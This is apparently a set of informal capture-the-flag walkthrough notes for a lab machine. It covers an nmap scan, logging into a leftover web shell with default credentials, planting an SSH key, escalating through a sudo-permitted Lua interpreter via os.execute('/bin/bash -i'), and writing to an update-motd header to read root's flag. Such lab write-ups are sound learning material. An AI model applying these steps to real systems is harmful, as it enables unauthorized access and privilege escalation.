---------------------------------------------------------

nmap -sC -sV 10.10.10.181

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
---------------
tried a 
dirb on the ip
Nothing turned up

The source code of the page revealed 
Some of the best web shells that you might need ;)
Google searched there is a github repo
The same user had a github with that description
I checked manually which files were present on the server and got into
http://10.10.10.181/smevk.php
loaded
The source of this shell showed their credentials as admin:admin
Uploaded a generated
ssh-keygen and used that to log in

In the main folder there was note about lua
When I used 
sudo -l 
it showed a luvit file
Thats a lua file that maybe I can escalate priveleges with
a search on lua escalate priveleges lead me to 
https://gtfobins.github.io/gtfobins/lua/
sudo -u sysadmin /home/sysadmin/luvit
os.execute(“/bin/bash -i”)

echo cat /root/root.txt>> 00-header
Relaunch the ssh and the root txt gets displayed as the motd
The update motd folder had the header